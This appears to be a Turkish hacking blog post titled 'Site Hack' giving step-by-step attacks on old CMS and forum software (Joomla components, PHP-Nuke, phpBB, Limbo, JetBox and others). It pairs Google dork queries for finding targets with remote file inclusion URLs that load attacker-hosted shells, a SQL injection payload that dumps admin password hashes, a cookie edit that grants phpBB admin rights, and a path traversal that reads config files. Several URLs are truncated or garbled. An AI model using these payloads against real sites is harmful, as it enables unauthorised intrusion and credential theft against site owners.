Site Hack


wWW.Google.com &l8217;&l8217;inurl:"com_remository"



Bulduğumuz sitelere



/[joomlapat....php?mosConfig]http://[sitepath]/[joomlapat....php?mosConfig _absolute_path=http://site/phpshell.php



Kodunu ekliyoruz...



-PHP NUKE SQL INJECTİON



www.googLe.com a giriyoruz aranacak kelimeye



&l8217;PHP-Nuke Copyright © 2004 by Francisco Burzi&l8217; yazıyoruz.



Bulduğumuz sitenin search bölümüne &l8217;p0gg0nsee%&l8217 UNION ALL SELECT 1*2*aid*pwd*5*6*7*8*9*10 FROM nuke_authors/*&l8217; yazmamız kafi



Search bölümünü bulamadıysanız



www.hackleneceksite.com/modules.php?name=Search



karşımız kullanıcı md5 hash çıkıyor bunu online kırıcı olan



http://www.milw0rm.com/cracker/insert.php



adreinden kırıyoruz şifre elimizde



PHPBB 2.0.11



işte meşhur phpbb açığı



Bize gereken en önemli program :



http://www.topshareware.com/cookie-E...nsfer-4659.htm [Cooike Editör]



Kurban sitemizi seçiyoruz ve üye oluyoruz üye girşi yaparken &l8217;BENİ HATIRLA&l8217; diyoruz ve siteye giriyoruz.



Daha sonra cooike editörümüzü açıyoruz önümüze şimdiye kadar girdiğimiz sitelerin isimler gelicek biz bunların arasından



kurban phpbb 2.0.11 sitemizi seçicez.



Sitemizi bulduk 2 kez tıklıyoruz.



Önümüze a%3A2%3A%7Bs%3A11%3A&l8220;autolog inid&l8220;%3Bs%3A0%3A%2 2&l8220;%3Bs%3A6%3A&l8220;userid&l8220;%3B s%3A1%3A&l8220;2&l8220;%3B%7D Gibi Abudik



Kubidik Kodlar Gelicek Üssteki Kodu Slip



a%3A2%3A%7Bs%3A11%3A&l8220;autolog inid&l8220;%3Bb%3A1%3Bs% 3A6%3A&l8220;userid&l8220;%3Bs%3A1%3A% 222&l8220;%3B%7D Bu kodu yeryeştiriyoruz



Saveliyoruz.



Artık cooike editör ile işimiz bitti



Sitemizi yeniliyoruz bakıyoruz aaaa adminiz



-TOPLİST HACK PHPBB



GoogLe Arama : inurl:"toplist.php" "powered by phpbb"





Exploit: /toplist.php?f=toplist_top10&ph pbb_root_path=http://yourhost/cmd.gif?cmd=ls





---------------------------------------------------------------------------

--------------

- PC_COOKBOOK JOOMLA COMPONENT



- pc_cookbook Joomla Component <= v0.3 Remote File Include Vulnerabilities



- Author: JaheeMCreW



- Uygulama : pc_cookbook Component



- Version : koyans 0.3



Yapmaniz gereken bir arama moturunda örnek google&l8217; da



" allinurl:com_pccookbook " olarak aratmaktir..



Exploit :



/[path]/compo...osConfig_absol]http://[target]/[path]/compo...osConfig_absol ute_path=http://evilscript





---------------------------------------------------------------------------

-------------

-SİMPLE BOARD MAMBO



İlk Önce WwwW.GoogLe.com



Daha Sonra Karşımıza Gelen Sitelere şu expolit i ekliyoruz...



http://site.com/components/com_simpl...me%20-a;id;pwd





---------------------------------------------------------------------------

-------------

-ShoutBox IncLusion



shoutBox KuruLu SistemLerde Remote FiLe IncLusion Acigi Var...



Code:



/shoutbox/expanded.php?conf=





GoogLe Arama : inurl:"/shoutbox/expanded.php?"



---------------------------------------------------------------------------

--------------

-PHPBAZAR <= 2.1.0 Remote File INCLLUSION



Google Search=inurl:classified.php phpbazar



http://hedefsite.com/classified_righ...ell.txt?cmd=id





---------------------------------------------------------------------------

---------------

-BoastMachine [bmachine]



yeni gözde blog sistemi olan bmachine&l8217;in 2.8 versiyonunda bulunan ufak bi açık :



site adresinden sonra index.php?id=../config.php yazıyoruz ve kaynak bölümüne bakınca adminin



şifresini görüyoruz : )





---------------------------------------------------------------------------

----------------

-Limbo CMS <= 1.04 Remote File Inclusion



GoogLe Arama : inurl:"index2.php?option=rss" OR "powered By Limbo CMS"





Exploit: /classes/adodbt/sql.php?classes_dir=http://yourhost/cmd.gif?cmd=ls

---------------------------------------------------------------------------

-----------------

-CaLogic Calendars V1.2.2 - Remote File Include



GoogLe Arama : CaLogic Calendars V1.2.2



kullanmak için :



/reconfig....1;evil_script]]http://site.com/[path]/reconfig....1;evil_script]

/srxclr.ph...1;evil_script]]http://site.com/[path]/srxclr.ph...1;evil_script]





---------------------------------------------------------------------------

------------------

-PafileDB Remote File Inclusion [phpBB]



PhpBB SiteLerde PafileDB &l8217;deki aciktan yararLanarak Remote kodlar calistirmaniza yariyor..





http://www.site.com/ [phpBBpath]/[pafiledbpath] /includes/pafiledb_constants.php?module_ root_path= ]http://[attacker]





---------------------------------------------------------------------------

-------------------

-JetBox CMS Remote File Include [ RFI ]



Acik henuz Yeni cikti.. ve bu yuzden herzaman ki gibi milyonlarca site hackLeme sansiniz var..



Uretici Firma :
http://jetbox.streamedge.com/



JetBox CMS Remote File Include



]http://[domain] /includes/phpdig/includes/config.php?relative_script_pat h=shell URL adresiniz..



GoogLe arama : Powered by Jetbox


0 yorum:

Hacker Video